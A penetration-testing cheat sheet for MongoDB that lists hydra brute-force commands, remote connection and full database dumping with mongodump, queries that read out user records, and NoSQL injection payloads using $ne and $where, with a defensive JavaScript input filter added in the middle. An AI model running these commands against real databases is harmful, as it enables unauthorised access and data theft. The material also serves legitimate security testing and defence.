MongoDB 27017
1. Nmap Scans for MongoDB
nmap --script mongodb-info -p 27017 <target-ip>
For database enumeration:
nmap --script mongodb-databases -p 27017 <target-ip>
2. Brute Forcing Credentials
Single username, password list:
hydra -l username -P passwords.txt <target-ip> mongodb
Username list, single password:
hydra -L usernames.txt -p password <target-ip> mongodb
3. Connecting to MongoDB
Local Connection:
mongo
mongo --port 27017
Remote Connection:
mongo --host <target-ip> --port 27017
For authenticated access:
mongo "mongodb://username:password@<target-ip>:27017/?authSource=admin"
4. Basic Commands
List all databases:
show dbs
Switch database or create if it doesn’t exist:
use <db_name>
List collections in the current database:
show collections
List all users in the current database:
show users
View database users:
db.system.users.find()
Run a JavaScript file:
load("example.js")
5. Data Retrieval Using Queries
Find all documents in a collection:
db.<collection_name>.find()
Find one document matching a condition:
db.<collection_name>.findOne({username: "admin"})
Operators:
$eq: Equal
db.<collection_name>.findOne({username: {"$eq": "admin"}})
$ne: Not equal
db.<collection_name>.findOne({password: {"$ne": "xyz"}})
$gt: Greater than
db.<collection_name>.findOne({id: {"$gt": "2"}})
6. Exploitation Techniques
Unsecured Instances:
Unauthenticated MongoDB instances allow direct access. Simply connect using:
mongo <target-ip>:27017
Dump all databases:
show dbs
use <db_name>
db.<collection_name>.find()
Export data using mongodump:
mongodump --host <target-ip> --port 27017 --out <output-dir>
Weak Credentials:
If credentials are identified (e.g., via brute force), authenticate and escalate data access.
No Authorization Restrictions:
Misconfigured MongoDB can allow creation or modification of collections:
db.createCollection("new_collection")
db.new_collection.insert({"key": "value"})
Script Injection via $where:
Execute JavaScript within queries:
db.<collection_name>.find({$where: "this.username == 'admin'"})
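From the defending side, the operators in sections 5 and 6 ($ne, $gt, $where) are what an application has to keep out of filters assembled from request data. The following is an added example, not part of the original cheat sheet: it builds equality-only filters and rejects operator keys. findOperatorKeys and buildFilter are hypothetical helper names, and the request bodies are constructed samples.

```javascript
// Added example: keep query operators out of filters built from untrusted input.
// findOperatorKeys and buildFilter are hypothetical helper names.

// Recursively collect the path of every key that starts with "$"
// (for example $ne, $gt, $where), at any nesting depth.
function findOperatorKeys(value, path = "") {
  if (value === null || typeof value !== "object") return [];
  const hits = [];
  for (const [key, child] of Object.entries(value)) {
    const here = path ? `${path}.${key}` : key;
    if (key.startsWith("$")) hits.push(here);
    hits.push(...findOperatorKeys(child, here));
  }
  return hits;
}

// Build a filter from request data. Only the listed fields are read, and
// each value must be a plain string; objects (which could carry operators)
// are rejected instead of being passed through to find()/findOne().
function buildFilter(untrusted, allowedFields) {
  const filter = {};
  for (const field of allowedFields) {
    const v = untrusted[field];
    if (typeof v !== "string") {
      const ops = findOperatorKeys({ [field]: v });
      const detail = ops.length ? ` (operators found: ${ops.join(", ")})` : "";
      throw new TypeError(`${field} must be a string${detail}`);
    }
    // $eq pins the comparison to a literal value.
    filter[field] = { $eq: v };
  }
  return filter;
}

// Constructed sample request bodies (not captured traffic).
const samples = [
  { username: "admin", password: "s3cret" },
  { username: "admin", password: { $ne: "xyz" } },
  { username: { $gt: "2" }, password: { $where: "this.username == 'admin'" } },
];
for (const body of samples) {
  try {
    console.log("accepted:", JSON.stringify(buildFilter(body, ["username", "password"])));
  } catch (e) {
    console.log("rejected:", e.message);
  }
}
```

On the server side, setting security.javascriptEnabled to false in mongod.conf disables server-side JavaScript, including $where.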
7. Automation with Scripts
You can automate enumeration and exploitation using custom scripts or tools:
Python automation script:
sudo git clone https://github.com/kozmic/NoSQLMap.git
cd NoSQLMap
python nosqlmap.py